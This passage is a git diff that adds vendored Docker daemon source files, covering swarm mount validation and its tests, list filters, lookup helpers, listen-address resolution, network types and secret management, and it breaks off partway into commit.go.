logAndExpect("health_status: healthy", nil) + logAndExpect("die", nil) + + // unhealthy event will be caught by checkHealth + logAndExpect("health_status: unhealthy", ErrContainerUnhealthy) +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go new file mode 100644 index 0000000000..5fda1f2edb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go @@ -0,0 +1,39 @@ +package container + +import ( + "fmt" + "path/filepath" + + "github.com/docker/swarmkit/api" +) + +func validateMounts(mounts []api.Mount) error { + for _, mount := range mounts { + // Target must always be absolute + if !filepath.IsAbs(mount.Target) { + return fmt.Errorf("invalid mount target, must be an absolute path: %s", mount.Target) + } + + switch mount.Type { + // The checks on abs paths are required due to the container API confusing + // volume mounts as bind mounts when the source is absolute (and vice-versa) + // See #25253 + // TODO: This is probably not necessary once #22373 is merged + case api.MountTypeBind: + if !filepath.IsAbs(mount.Source) { + return fmt.Errorf("invalid bind mount source, must be an absolute path: %s", mount.Source) + } + case api.MountTypeVolume: + if filepath.IsAbs(mount.Source) { + return fmt.Errorf("invalid volume mount source, must not be an absolute path: %s", mount.Source) + } + case api.MountTypeTmpfs: + if mount.Source != "" { + return fmt.Errorf("invalid tmpfs source, source must be empty") + } + default: + return fmt.Errorf("invalid mount type: %s", mount.Type) + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go new file mode 100644 index 0000000000..9d98e2c008 --- /dev/null +++ 
b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go @@ -0,0 +1,141 @@ +package container + +import ( + "io/ioutil" + "os" + "strings" + "testing" + + "github.com/docker/docker/daemon" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/swarmkit/api" +) + +func newTestControllerWithMount(m api.Mount) (*controller, error) { + return newController(&daemon.Daemon{}, &api.Task{ + ID: stringid.GenerateRandomID(), + ServiceID: stringid.GenerateRandomID(), + Spec: api.TaskSpec{ + Runtime: &api.TaskSpec_Container{ + Container: &api.ContainerSpec{ + Image: "image_name", + Labels: map[string]string{ + "com.docker.swarm.task.id": "id", + }, + Mounts: []api.Mount{m}, + }, + }, + }, + }, nil) +} + +func TestControllerValidateMountBind(t *testing.T) { + // with improper source + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeBind, + Source: "foo", + Target: testAbsPath, + }); err == nil || !strings.Contains(err.Error(), "invalid bind mount source") { + t.Fatalf("expected error, got: %v", err) + } + + // with non-existing source + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeBind, + Source: testAbsNonExistent, + Target: testAbsPath, + }); err != nil { + t.Fatalf("controller should not error at creation: %v", err) + } + + // with proper source + tmpdir, err := ioutil.TempDir("", "TestControllerValidateMountBind") + if err != nil { + t.Fatalf("failed to create temp dir: %v", err) + } + defer os.Remove(tmpdir) + + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeBind, + Source: tmpdir, + Target: testAbsPath, + }); err != nil { + t.Fatalf("expected error, got: %v", err) + } +} + +func TestControllerValidateMountVolume(t *testing.T) { + // with improper source + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeVolume, + Source: testAbsPath, + Target: testAbsPath, + }); err == nil || !strings.Contains(err.Error(), "invalid volume mount source") { 
+ t.Fatalf("expected error, got: %v", err) + } + + // with proper source + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeVolume, + Source: "foo", + Target: testAbsPath, + }); err != nil { + t.Fatalf("expected error, got: %v", err) + } +} + +func TestControllerValidateMountTarget(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "TestControllerValidateMountTarget") + if err != nil { + t.Fatalf("failed to create temp dir: %v", err) + } + defer os.Remove(tmpdir) + + // with improper target + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeBind, + Source: testAbsPath, + Target: "foo", + }); err == nil || !strings.Contains(err.Error(), "invalid mount target") { + t.Fatalf("expected error, got: %v", err) + } + + // with proper target + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeBind, + Source: tmpdir, + Target: testAbsPath, + }); err != nil { + t.Fatalf("expected no error, got: %v", err) + } +} + +func TestControllerValidateMountTmpfs(t *testing.T) { + // with improper target + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeTmpfs, + Source: "foo", + Target: testAbsPath, + }); err == nil || !strings.Contains(err.Error(), "invalid tmpfs source") { + t.Fatalf("expected error, got: %v", err) + } + + // with proper target + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.MountTypeTmpfs, + Target: testAbsPath, + }); err != nil { + t.Fatalf("expected no error, got: %v", err) + } +} + +func TestControllerValidateMountInvalidType(t *testing.T) { + // with improper target + if _, err := newTestControllerWithMount(api.Mount{ + Type: api.Mount_MountType(9999), + Source: "foo", + Target: testAbsPath, + }); err == nil || !strings.Contains(err.Error(), "invalid mount type") { + t.Fatalf("expected error, got: %v", err) + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go 
b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go new file mode 100644 index 0000000000..c616eeef93 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go @@ -0,0 +1,8 @@ +// +build !windows + +package container + +const ( + testAbsPath = "/foo" + testAbsNonExistent = "/some-non-existing-host-path/" +) diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go new file mode 100644 index 0000000000..c346451d3d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go @@ -0,0 +1,8 @@ +// +build windows + +package container + +const ( + testAbsPath = `c:\foo` + testAbsNonExistent = `c:\some-non-existing-host-path\` +) diff --git a/vendor/github.com/docker/docker/daemon/cluster/filters.go b/vendor/github.com/docker/docker/daemon/cluster/filters.go new file mode 100644 index 0000000000..88668edaac --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/filters.go @@ -0,0 +1,116 @@ +package cluster + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types/filters" + runconfigopts "github.com/docker/docker/runconfig/opts" + swarmapi "github.com/docker/swarmkit/api" +) + +func newListNodesFilters(filter filters.Args) (*swarmapi.ListNodesRequest_Filters, error) { + accepted := map[string]bool{ + "name": true, + "id": true, + "label": true, + "role": true, + "membership": true, + } + if err := filter.Validate(accepted); err != nil { + return nil, err + } + f := &swarmapi.ListNodesRequest_Filters{ + NamePrefixes: filter.Get("name"), + IDPrefixes: filter.Get("id"), + Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), + } + + for _, r := range filter.Get("role") { + if role, ok := swarmapi.NodeRole_value[strings.ToUpper(r)]; ok { + f.Roles = append(f.Roles, 
swarmapi.NodeRole(role)) + } else if r != "" { + return nil, fmt.Errorf("Invalid role filter: '%s'", r) + } + } + + for _, a := range filter.Get("membership") { + if membership, ok := swarmapi.NodeSpec_Membership_value[strings.ToUpper(a)]; ok { + f.Memberships = append(f.Memberships, swarmapi.NodeSpec_Membership(membership)) + } else if a != "" { + return nil, fmt.Errorf("Invalid membership filter: '%s'", a) + } + } + + return f, nil +} + +func newListServicesFilters(filter filters.Args) (*swarmapi.ListServicesRequest_Filters, error) { + accepted := map[string]bool{ + "name": true, + "id": true, + "label": true, + } + if err := filter.Validate(accepted); err != nil { + return nil, err + } + return &swarmapi.ListServicesRequest_Filters{ + NamePrefixes: filter.Get("name"), + IDPrefixes: filter.Get("id"), + Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), + }, nil +} + +func newListTasksFilters(filter filters.Args, transformFunc func(filters.Args) error) (*swarmapi.ListTasksRequest_Filters, error) { + accepted := map[string]bool{ + "name": true, + "id": true, + "label": true, + "service": true, + "node": true, + "desired-state": true, + } + if err := filter.Validate(accepted); err != nil { + return nil, err + } + if transformFunc != nil { + if err := transformFunc(filter); err != nil { + return nil, err + } + } + f := &swarmapi.ListTasksRequest_Filters{ + NamePrefixes: filter.Get("name"), + IDPrefixes: filter.Get("id"), + Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), + ServiceIDs: filter.Get("service"), + NodeIDs: filter.Get("node"), + } + + for _, s := range filter.Get("desired-state") { + if state, ok := swarmapi.TaskState_value[strings.ToUpper(s)]; ok { + f.DesiredStates = append(f.DesiredStates, swarmapi.TaskState(state)) + } else if s != "" { + return nil, fmt.Errorf("Invalid desired-state filter: '%s'", s) + } + } + + return f, nil +} + +func newListSecretsFilters(filter filters.Args) (*swarmapi.ListSecretsRequest_Filters, 
error) { + accepted := map[string]bool{ + "names": true, + "name": true, + "id": true, + "label": true, + } + if err := filter.Validate(accepted); err != nil { + return nil, err + } + return &swarmapi.ListSecretsRequest_Filters{ + Names: filter.Get("names"), + NamePrefixes: filter.Get("name"), + IDPrefixes: filter.Get("id"), + Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/helpers.go b/vendor/github.com/docker/docker/daemon/cluster/helpers.go new file mode 100644 index 0000000000..be5bf56e87 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/helpers.go @@ -0,0 +1,108 @@ +package cluster + +import ( + "fmt" + + swarmapi "github.com/docker/swarmkit/api" + "golang.org/x/net/context" +) + +func getSwarm(ctx context.Context, c swarmapi.ControlClient) (*swarmapi.Cluster, error) { + rl, err := c.ListClusters(ctx, &swarmapi.ListClustersRequest{}) + if err != nil { + return nil, err + } + + if len(rl.Clusters) == 0 { + return nil, fmt.Errorf("swarm not found") + } + + // TODO: assume one cluster only + return rl.Clusters[0], nil +} + +func getNode(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Node, error) { + // GetNode to match via full ID. + rg, err := c.GetNode(ctx, &swarmapi.GetNodeRequest{NodeID: input}) + if err != nil { + // If any error (including NotFound), ListNodes to match via full name. + rl, err := c.ListNodes(ctx, &swarmapi.ListNodesRequest{Filters: &swarmapi.ListNodesRequest_Filters{Names: []string{input}}}) + + if err != nil || len(rl.Nodes) == 0 { + // If any error or 0 result, ListNodes to match via ID prefix. 
+ rl, err = c.ListNodes(ctx, &swarmapi.ListNodesRequest{Filters: &swarmapi.ListNodesRequest_Filters{IDPrefixes: []string{input}}}) + } + + if err != nil { + return nil, err + } + + if len(rl.Nodes) == 0 { + return nil, fmt.Errorf("node %s not found", input) + } + + if l := len(rl.Nodes); l > 1 { + return nil, fmt.Errorf("node %s is ambiguous (%d matches found)", input, l) + } + + return rl.Nodes[0], nil + } + return rg.Node, nil +} + +func getService(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Service, error) { + // GetService to match via full ID. + rg, err := c.GetService(ctx, &swarmapi.GetServiceRequest{ServiceID: input}) + if err != nil { + // If any error (including NotFound), ListServices to match via full name. + rl, err := c.ListServices(ctx, &swarmapi.ListServicesRequest{Filters: &swarmapi.ListServicesRequest_Filters{Names: []string{input}}}) + if err != nil || len(rl.Services) == 0 { + // If any error or 0 result, ListServices to match via ID prefix. + rl, err = c.ListServices(ctx, &swarmapi.ListServicesRequest{Filters: &swarmapi.ListServicesRequest_Filters{IDPrefixes: []string{input}}}) + } + + if err != nil { + return nil, err + } + + if len(rl.Services) == 0 { + return nil, fmt.Errorf("service %s not found", input) + } + + if l := len(rl.Services); l > 1 { + return nil, fmt.Errorf("service %s is ambiguous (%d matches found)", input, l) + } + + return rl.Services[0], nil + } + return rg.Service, nil +} + +func getTask(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Task, error) { + // GetTask to match via full ID. + rg, err := c.GetTask(ctx, &swarmapi.GetTaskRequest{TaskID: input}) + if err != nil { + // If any error (including NotFound), ListTasks to match via full name. + rl, err := c.ListTasks(ctx, &swarmapi.ListTasksRequest{Filters: &swarmapi.ListTasksRequest_Filters{Names: []string{input}}}) + + if err != nil || len(rl.Tasks) == 0 { + // If any error or 0 result, ListTasks to match via ID prefix. 
+ rl, err = c.ListTasks(ctx, &swarmapi.ListTasksRequest{Filters: &swarmapi.ListTasksRequest_Filters{IDPrefixes: []string{input}}}) + } + + if err != nil { + return nil, err + } + + if len(rl.Tasks) == 0 { + return nil, fmt.Errorf("task %s not found", input) + } + + if l := len(rl.Tasks); l > 1 { + return nil, fmt.Errorf("task %s is ambiguous (%d matches found)", input, l) + } + + return rl.Tasks[0], nil + } + return rg.Task, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go new file mode 100644 index 0000000000..c24d4865b3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go @@ -0,0 +1,278 @@ +package cluster + +import ( + "errors" + "fmt" + "net" +) + +var ( + errNoSuchInterface = errors.New("no such interface") + errNoIP = errors.New("could not find the system's IP address") + errMustSpecifyListenAddr = errors.New("must specify a listening address because the address to advertise is not recognized as a system address, and a system's IP address to use could not be uniquely identified") + errBadListenAddr = errors.New("listen address must be an IP address or network interface (with optional port number)") + errBadAdvertiseAddr = errors.New("advertise address must be a non-zero IP address or network interface (with optional port number)") + errBadDefaultAdvertiseAddr = errors.New("default advertise address must be a non-zero IP address or network interface (without a port number)") +) + +func resolveListenAddr(specifiedAddr string) (string, string, error) { + specifiedHost, specifiedPort, err := net.SplitHostPort(specifiedAddr) + if err != nil { + return "", "", fmt.Errorf("could not parse listen address %s", specifiedAddr) + } + + // Does the host component match any of the interface names on the + // system? If so, use the address from that interface. 
+ interfaceAddr, err := resolveInterfaceAddr(specifiedHost) + if err == nil { + return interfaceAddr.String(), specifiedPort, nil + } + if err != errNoSuchInterface { + return "", "", err + } + + // If it's not an interface, it must be an IP (for now) + if net.ParseIP(specifiedHost) == nil { + return "", "", errBadListenAddr + } + + return specifiedHost, specifiedPort, nil +} + +func (c *Cluster) resolveAdvertiseAddr(advertiseAddr, listenAddrPort string) (string, string, error) { + // Approach: + // - If an advertise address is specified, use that. Resolve the + // interface's address if an interface was specified in + // advertiseAddr. Fill in the port from listenAddrPort if necessary. + // - If DefaultAdvertiseAddr is not empty, use that with the port from + // listenAddrPort. Resolve the interface's address from + // if an interface name was specified in DefaultAdvertiseAddr. + // - Otherwise, try to autodetect the system's address. Use the port in + // listenAddrPort with this address if autodetection succeeds. + + if advertiseAddr != "" { + advertiseHost, advertisePort, err := net.SplitHostPort(advertiseAddr) + if err != nil { + // Not a host:port specification + advertiseHost = advertiseAddr + advertisePort = listenAddrPort + } + + // Does the host component match any of the interface names on the + // system? If so, use the address from that interface. + interfaceAddr, err := resolveInterfaceAddr(advertiseHost) + if err == nil { + return interfaceAddr.String(), advertisePort, nil + } + if err != errNoSuchInterface { + return "", "", err + } + + // If it's not an interface, it must be an IP (for now) + if ip := net.ParseIP(advertiseHost); ip == nil || ip.IsUnspecified() { + return "", "", errBadAdvertiseAddr + } + + return advertiseHost, advertisePort, nil + } + + if c.config.DefaultAdvertiseAddr != "" { + // Does the default advertise address component match any of the + // interface names on the system? If so, use the address from + // that interface. 
+ interfaceAddr, err := resolveInterfaceAddr(c.config.DefaultAdvertiseAddr) + if err == nil { + return interfaceAddr.String(), listenAddrPort, nil + } + if err != errNoSuchInterface { + return "", "", err + } + + // If it's not an interface, it must be an IP (for now) + if ip := net.ParseIP(c.config.DefaultAdvertiseAddr); ip == nil || ip.IsUnspecified() { + return "", "", errBadDefaultAdvertiseAddr + } + + return c.config.DefaultAdvertiseAddr, listenAddrPort, nil + } + + systemAddr, err := c.resolveSystemAddr() + if err != nil { + return "", "", err + } + return systemAddr.String(), listenAddrPort, nil +} + +func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) { + // Use a specific interface's IP address. + intf, err := net.InterfaceByName(specifiedInterface) + if err != nil { + return nil, errNoSuchInterface + } + + addrs, err := intf.Addrs() + if err != nil { + return nil, err + } + + var interfaceAddr4, interfaceAddr6 net.IP + + for _, addr := range addrs { + ipAddr, ok := addr.(*net.IPNet) + + if ok { + if ipAddr.IP.To4() != nil { + // IPv4 + if interfaceAddr4 != nil { + return nil, fmt.Errorf("interface %s has more than one IPv4 address (%s and %s)", specifiedInterface, interfaceAddr4, ipAddr.IP) + } + interfaceAddr4 = ipAddr.IP + } else { + // IPv6 + if interfaceAddr6 != nil { + return nil, fmt.Errorf("interface %s has more than one IPv6 address (%s and %s)", specifiedInterface, interfaceAddr6, ipAddr.IP) + } + interfaceAddr6 = ipAddr.IP + } + } + } + + if interfaceAddr4 == nil && interfaceAddr6 == nil { + return nil, fmt.Errorf("interface %s has no usable IPv4 or IPv6 address", specifiedInterface) + } + + // In the case that there's exactly one IPv4 address + // and exactly one IPv6 address, favor IPv4 over IPv6. 
+ if interfaceAddr4 != nil { + return interfaceAddr4, nil + } + return interfaceAddr6, nil +} + +func (c *Cluster) resolveSystemAddrViaSubnetCheck() (net.IP, error) { + // Use the system's only IP address, or fail if there are + // multiple addresses to choose from. Skip interfaces which + // are managed by docker via subnet check. + interfaces, err := net.Interfaces() + if err != nil { + return nil, err + } + + var systemAddr net.IP + var systemInterface string + + // List Docker-managed subnets + v4Subnets := c.config.NetworkSubnetsProvider.V4Subnets() + v6Subnets := c.config.NetworkSubnetsProvider.V6Subnets() + +ifaceLoop: + for _, intf := range interfaces { + // Skip inactive interfaces and loopback interfaces + if (intf.Flags&net.FlagUp == 0) || (intf.Flags&net.FlagLoopback) != 0 { + continue + } + + addrs, err := intf.Addrs() + if err != nil { + continue + } + + var interfaceAddr4, interfaceAddr6 net.IP + + for _, addr := range addrs { + ipAddr, ok := addr.(*net.IPNet) + + // Skip loopback and link-local addresses + if !ok || !ipAddr.IP.IsGlobalUnicast() { + continue + } + + if ipAddr.IP.To4() != nil { + // IPv4 + + // Ignore addresses in subnets that are managed by Docker. + for _, subnet := range v4Subnets { + if subnet.Contains(ipAddr.IP) { + continue ifaceLoop + } + } + + if interfaceAddr4 != nil { + return nil, errMultipleIPs(intf.Name, intf.Name, interfaceAddr4, ipAddr.IP) + } + + interfaceAddr4 = ipAddr.IP + } else { + // IPv6 + + // Ignore addresses in subnets that are managed by Docker. + for _, subnet := range v6Subnets { + if subnet.Contains(ipAddr.IP) { + continue ifaceLoop + } + } + + if interfaceAddr6 != nil { + return nil, errMultipleIPs(intf.Name, intf.Name, interfaceAddr6, ipAddr.IP) + } + + interfaceAddr6 = ipAddr.IP + } + } + + // In the case that this interface has exactly one IPv4 address + // and exactly one IPv6 address, favor IPv4 over IPv6. 
+ if interfaceAddr4 != nil { + if systemAddr != nil { + return nil, errMultipleIPs(systemInterface, intf.Name, systemAddr, interfaceAddr4) + } + systemAddr = interfaceAddr4 + systemInterface = intf.Name + } else if interfaceAddr6 != nil { + if systemAddr != nil { + return nil, errMultipleIPs(systemInterface, intf.Name, systemAddr, interfaceAddr6) + } + systemAddr = interfaceAddr6 + systemInterface = intf.Name + } + } + + if systemAddr == nil { + return nil, errNoIP + } + + return systemAddr, nil +} + +func listSystemIPs() []net.IP { + interfaces, err := net.Interfaces() + if err != nil { + return nil + } + + var systemAddrs []net.IP + + for _, intf := range interfaces { + addrs, err := intf.Addrs() + if err != nil { + continue + } + + for _, addr := range addrs { + ipAddr, ok := addr.(*net.IPNet) + + if ok { + systemAddrs = append(systemAddrs, ipAddr.IP) + } + } + } + + return systemAddrs +} + +func errMultipleIPs(interfaceA, interfaceB string, addrA, addrB net.IP) error { + if interfaceA == interfaceB { + return fmt.Errorf("could not choose an IP address to advertise since this system has multiple addresses on interface %s (%s and %s)", interfaceA, addrA, addrB) + } + return fmt.Errorf("could not choose an IP address to advertise since this system has multiple addresses on different interfaces (%s on %s and %s on %s)", addrA, interfaceA, addrB, interfaceB) +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go new file mode 100644 index 0000000000..3d4f239bda --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go @@ -0,0 +1,91 @@ +// +build linux + +package cluster + +import ( + "net" + + "github.com/vishvananda/netlink" +) + +func (c *Cluster) resolveSystemAddr() (net.IP, error) { + // Use the system's only device IP address, or fail if there are + // multiple addresses to choose from. 
+ interfaces, err := netlink.LinkList() + if err != nil { + return nil, err + } + + var ( + systemAddr net.IP + systemInterface string + deviceFound bool + ) + + for _, intf := range interfaces { + // Skip non device or inactive interfaces + if intf.Type() != "device" || intf.Attrs().Flags&net.FlagUp == 0 { + continue + } + + addrs, err := netlink.AddrList(intf, netlink.FAMILY_ALL) + if err != nil { + continue + } + + var interfaceAddr4, interfaceAddr6 net.IP + + for _, addr := range addrs { + ipAddr := addr.IPNet.IP + + // Skip loopback and link-local addresses + if !ipAddr.IsGlobalUnicast() { + continue + } + + // At least one non-loopback device is found and it is administratively up + deviceFound = true + + if ipAddr.To4() != nil { + if interfaceAddr4 != nil { + return nil, errMultipleIPs(intf.Attrs().Name, intf.Attrs().Name, interfaceAddr4, ipAddr) + } + interfaceAddr4 = ipAddr + } else { + if interfaceAddr6 != nil { + return nil, errMultipleIPs(intf.Attrs().Name, intf.Attrs().Name, interfaceAddr6, ipAddr) + } + interfaceAddr6 = ipAddr + } + } + + // In the case that this interface has exactly one IPv4 address + // and exactly one IPv6 address, favor IPv4 over IPv6. + if interfaceAddr4 != nil { + if systemAddr != nil { + return nil, errMultipleIPs(systemInterface, intf.Attrs().Name, systemAddr, interfaceAddr4) + } + systemAddr = interfaceAddr4 + systemInterface = intf.Attrs().Name + } else if interfaceAddr6 != nil { + if systemAddr != nil { + return nil, errMultipleIPs(systemInterface, intf.Attrs().Name, systemAddr, interfaceAddr6) + } + systemAddr = interfaceAddr6 + systemInterface = intf.Attrs().Name + } + } + + if systemAddr == nil { + if !deviceFound { + // If no non-loopback device type interface is found, + // fall back to the regular auto-detection mechanism. + // This is to cover the case where docker is running + // inside a container (eths are in fact veths). 
+ return c.resolveSystemAddrViaSubnetCheck() + } + return nil, errNoIP + } + + return systemAddr, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go new file mode 100644 index 0000000000..4e845f5c8f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go @@ -0,0 +1,9 @@ +// +build !linux,!solaris + +package cluster + +import "net" + +func (c *Cluster) resolveSystemAddr() (net.IP, error) { + return c.resolveSystemAddrViaSubnetCheck() +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go new file mode 100644 index 0000000000..57a894b251 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go @@ -0,0 +1,57 @@ +package cluster + +import ( + "bufio" + "fmt" + "net" + "os/exec" + "strings" +) + +func (c *Cluster) resolveSystemAddr() (net.IP, error) { + defRouteCmd := "/usr/sbin/ipadm show-addr -p -o addr " + + "`/usr/sbin/route get default | /usr/bin/grep interface | " + + "/usr/bin/awk '{print $2}'`" + out, err := exec.Command("/usr/bin/bash", "-c", defRouteCmd).Output() + if err != nil { + return nil, fmt.Errorf("cannot get default route: %v", err) + } + + defInterface := strings.SplitN(string(out), "/", 2) + defInterfaceIP := net.ParseIP(defInterface[0]) + + return defInterfaceIP, nil +} + +func listSystemIPs() []net.IP { + var systemAddrs []net.IP + cmd := exec.Command("/usr/sbin/ipadm", "show-addr", "-p", "-o", "addr") + cmdReader, err := cmd.StdoutPipe() + if err != nil { + return nil + } + + if err := cmd.Start(); err != nil { + return nil + } + + scanner := bufio.NewScanner(cmdReader) + go func() { + for scanner.Scan() { + text := scanner.Text() + nameAddrPair := strings.SplitN(text, "/", 2) + // Let go of loopback interfaces and docker interfaces + systemAddrs = append(systemAddrs, 
net.ParseIP(nameAddrPair[0])) + } + }() + + if err := scanner.Err(); err != nil { + fmt.Printf("scan underwent err: %+v\n", err) + } + + if err := cmd.Wait(); err != nil { + fmt.Printf("run command wait: %+v\n", err) + } + + return systemAddrs +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/provider/network.go b/vendor/github.com/docker/docker/daemon/cluster/provider/network.go new file mode 100644 index 0000000000..f4c72ae13b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/provider/network.go @@ -0,0 +1,37 @@ +package provider + +import "github.com/docker/docker/api/types" + +// NetworkCreateRequest is a request when creating a network. +type NetworkCreateRequest struct { + ID string + types.NetworkCreateRequest +} + +// NetworkCreateResponse is a response when creating a network. +type NetworkCreateResponse struct { + ID string `json:"Id"` +} + +// VirtualAddress represents a virtual address. +type VirtualAddress struct { + IPv4 string + IPv6 string +} + +// PortConfig represents a port configuration. +type PortConfig struct { + Name string + Protocol int32 + TargetPort uint32 + PublishedPort uint32 +} + +// ServiceConfig represents a service configuration. 
+type ServiceConfig struct { + ID string + Name string + Aliases map[string][]string + VirtualAddresses map[string]*VirtualAddress + ExposedPorts []*PortConfig +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/secrets.go b/vendor/github.com/docker/docker/daemon/cluster/secrets.go new file mode 100644 index 0000000000..2b9eb5da1d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/secrets.go @@ -0,0 +1,133 @@ +package cluster + +import ( + apitypes "github.com/docker/docker/api/types" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + swarmapi "github.com/docker/swarmkit/api" +) + +// GetSecret returns a secret from a managed swarm cluster +func (c *Cluster) GetSecret(id string) (types.Secret, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return types.Secret{}, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := c.node.client.GetSecret(ctx, &swarmapi.GetSecretRequest{SecretID: id}) + if err != nil { + return types.Secret{}, err + } + + return convert.SecretFromGRPC(r.Secret), nil +} + +// GetSecrets returns all secrets of a managed swarm cluster. +func (c *Cluster) GetSecrets(options apitypes.SecretListOptions) ([]types.Secret, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return nil, c.errNoManager() + } + + filters, err := newListSecretsFilters(options.Filters) + if err != nil { + return nil, err + } + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := c.node.client.ListSecrets(ctx, + &swarmapi.ListSecretsRequest{Filters: filters}) + if err != nil { + return nil, err + } + + secrets := []types.Secret{} + + for _, secret := range r.Secrets { + secrets = append(secrets, convert.SecretFromGRPC(secret)) + } + + return secrets, nil +} + +// CreateSecret creates a new secret in a managed swarm cluster. 
+func (c *Cluster) CreateSecret(s types.SecretSpec) (string, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return "", c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + secretSpec := convert.SecretSpecToGRPC(s) + + r, err := c.node.client.CreateSecret(ctx, + &swarmapi.CreateSecretRequest{Spec: &secretSpec}) + if err != nil { + return "", err + } + + return r.Secret.ID, nil +} + +// RemoveSecret removes a secret from a managed swarm cluster. +func (c *Cluster) RemoveSecret(id string) error { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + req := &swarmapi.RemoveSecretRequest{ + SecretID: id, + } + + if _, err := c.node.client.RemoveSecret(ctx, req); err != nil { + return err + } + return nil +} + +// UpdateSecret updates a secret in a managed swarm cluster. +// Note: this is not exposed to the CLI but is available from the API only +func (c *Cluster) UpdateSecret(id string, version uint64, spec types.SecretSpec) error { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + secretSpec := convert.SecretSpecToGRPC(spec) + + if _, err := c.client.UpdateSecret(ctx, + &swarmapi.UpdateSecretRequest{ + SecretID: id, + SecretVersion: &swarmapi.Version{ + Index: version, + }, + Spec: &secretSpec, + }); err != nil { + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/commit.go b/vendor/github.com/docker/docker/daemon/commit.go new file mode 100644 index 0000000000..1e7bffb1dc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/commit.go @@ -0,0 +1,271 @@ +package daemon + +import ( + "encoding/json" + "fmt" + "io" + "runtime" + "strings" + "time" + + "github.com/docker/docker/api/types/backend" + containertypes "github.com/docker/docker/api/types/container" + 
"github.com/docker/docker/builder/dockerfile" + "github.com/docker/docker/container" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/reference" +) + +// merge merges two Config, the image container configuration (defaults values), +// and the user container configuration, either passed by the API or generated +// by the cli. +// It will mutate the specified user configuration (userConf) with the image +// configuration where the user configuration is incomplete. +func merge(userConf, imageConf *containertypes.Config) error { + if userConf.User == "" { + userConf.User = imageConf.User + } + if len(userConf.ExposedPorts) == 0 { + userConf.ExposedPorts = imageConf.ExposedPorts + } else if imageConf.ExposedPorts != nil { + for port := range imageConf.ExposedPorts { + if _, exists := userConf.ExposedPorts[port]; !exists { + userConf.ExposedPorts[port] = struct{}{} + } + } + } + + if len(userConf.Env) == 0 { + userConf.Env = imageConf.Env + } else { + for _, imageEnv := range imageConf.Env { + found := false + imageEnvKey := strings.Split(imageEnv, "=")[0] + for _, userEnv := range userConf.Env { + userEnvKey := strings.Split(userEnv, "=")[0] + if runtime.GOOS == "windows" { + // Case insensitive environment variables on Windows + imageEnvKey 